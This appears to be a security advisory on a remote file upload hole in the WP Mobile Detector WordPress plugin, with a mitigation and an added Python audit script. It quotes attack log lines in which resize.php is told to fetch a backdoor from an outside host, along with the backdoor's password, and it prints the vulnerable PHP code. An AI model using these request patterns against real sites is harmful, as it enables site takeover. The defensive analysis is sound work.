
WP Mobile Detector Vulnerability
WP Mobile Detector, a WordPress plugin, contains a vulnerability in versions prior to 3.6. Exploitation of this vulnerability could allow an attacker to take control of an affected website.
US-CERT encourages users and administrators to review the WP Mobile Detector Changelog for more information and apply the necessary update.
The vulnerability is very easy to exploit: all the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, although in this case it just includes resize.php) inside the plugin directory, with the backdoor URL as the src parameter.
This is one of the payloads we are actively seeing in the wild:
188.73.152.166 - - [31/May/2016:23:54:43 -0400] "POST /wp-content/plugins/wp-mobile-detector/resize.php Payload:src=hxxp://copia[.]ru/mig/tmp/css.php"
The request above makes resize.php fetch css.php and save it into the cache directory inside the plugin folder. Once the upload has completed, the attackers try to access the backdoor:
46.182.30.164 - - [02/Jun/2016:14:25:01 -0400] "POST /wp-content/plugins/wp-mobile-detector/cache/css.php HTTP/1.1" Payload: pass=dinamit
The attacker authenticates to the backdoor with the password “dinamit”. As for the vulnerability itself, the insecure code is in resize.php, at this part:

if (isset($_REQUEST['src'])) {
    $path = dirname(__FILE__) . "/cache/" . basename($_REQUEST['src']);
    if(file_exists($path)){
        ...skipped…
    }else{
        file_put_contents($path, file_get_contents($_REQUEST['src']));
        ...skipped…
    }
    ...skipped…
As you can see, it’s a simple vulnerability that stems from failing to validate and sanitize input from an untrusted source. No security checks are performed: the src value is passed straight to file_get_contents() and the result is written under the web root with the original file name, so an attacker can point src at a malicious URL serving PHP code and it becomes a PHP file inside the cache directory.
Unfortunately, at the time this post was published no updated version was available and the plugin had been removed from the repository. We highly recommend that everyone remove this plugin for now. If you really need it, a partial temporary fix is to disable PHP execution in the wp-mobile-detector/cache subdirectory, for example with this code in its .htaccess file:

<Files *.php>
    deny from all
</Files>

Please note that this fix only stops uploaded PHP from executing on your server. Hackers will still be able to upload files to the cache subdirectory and link to them in attacks on third-party sites (iframes, scripts, malicious downloads), or simply host spammy/illegal content there. You can also revoke write permissions on the cache subdirectory altogether, but that may break the plugin's functionality.
At this moment the majority of the vulnerable sites are infected with porn spam doorways. You can usually find a gopni3g directory in the site root, which contains story.php (the doorway generator script), an .htaccess file and subdirectories with spammy files and templates. The doorways redirect visitors to hxxp://bipaoeity[.]in/for/77?d=.
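The mitigation check and the post-compromise indicators above can be folded into one filesystem audit: flag any PHP file under the plugin's cache directory, verify that the cache .htaccess actually blocks PHP, and look for the gopni3g/story.php doorway layout in the site root. This is an added example, not a tool from the post or the plugin; it builds a throwaway webroot with placeholder files to run against, and accepts both the Apache 2.2 "deny from all" form shown above and the equivalent Apache 2.4 "Require all denied" directive.

```python
import tempfile
from pathlib import Path

CACHE_DIR = Path("wp-content/plugins/wp-mobile-detector/cache")
PHP_SUFFIXES = (".php", ".phtml", ".php5")
# Apache 2.2 and 2.4 spellings of a blanket deny; matched case-insensitively.
DENY_RULES = ("deny from all", "require all denied")


def audit_webroot(root):
    """Return a sorted list of finding strings for one WordPress site root."""
    root = Path(root)
    findings = []
    cache = root / CACHE_DIR
    if cache.is_dir():
        # The plugin writes only resized images here; any PHP file is foreign.
        for p in cache.rglob("*"):
            if p.is_file() and p.suffix.lower() in PHP_SUFFIXES:
                findings.append(f"php_in_cache:{p.relative_to(root).as_posix()}")
        # Is PHP execution blocked in the cache directory?
        ht = cache / ".htaccess"
        text = ht.read_text(errors="ignore").lower() if ht.is_file() else ""
        if not any(rule in text for rule in DENY_RULES):
            findings.append("cache_php_not_blocked")
    # Doorway indicators named in the post: gopni3g/ with story.php inside.
    doorway = root / "gopni3g"
    if doorway.is_dir():
        findings.append("doorway_dir:gopni3g")
        if (doorway / "story.php").is_file():
            findings.append("doorway_generator:gopni3g/story.php")
    return sorted(findings)


def build_demo_tree():
    """Constructed sample: a temp webroot mimicking the compromised layout (placeholder files, not real malware)."""
    root = Path(tempfile.mkdtemp(prefix="wpmd-demo-"))
    cache = root / CACHE_DIR
    cache.mkdir(parents=True)
    (cache / "css.php").write_text("<?php /* placeholder standing in for the dropped backdoor */ ?>")
    (cache / "thumb.jpg").write_bytes(b"\xff\xd8\xff")  # a legitimate resized image
    (root / "gopni3g").mkdir()
    (root / "gopni3g" / "story.php").write_text("<?php /* placeholder doorway generator */ ?>")
    return root


def build_clean_tree():
    """Constructed sample: a temp webroot with the .htaccess mitigation applied and no foreign files."""
    root = Path(tempfile.mkdtemp(prefix="wpmd-clean-"))
    cache = root / CACHE_DIR
    cache.mkdir(parents=True)
    (cache / ".htaccess").write_text("<Files *.php>\nRequire all denied\n</Files>\n")
    (cache / "thumb.jpg").write_bytes(b"\xff\xd8\xff")
    return root


if __name__ == "__main__":
    for label, builder in (("demo", build_demo_tree), ("clean", build_clean_tree)):
        print(label, audit_webroot(builder()) or ["no findings"])
```

Run it against a real site by calling audit_webroot("/var/www/html") (path assumed). A "php_in_cache" hit means the upload stage already happened regardless of whether the .htaccess rule was later added, so treat it as an incident indicator rather than a misconfiguration.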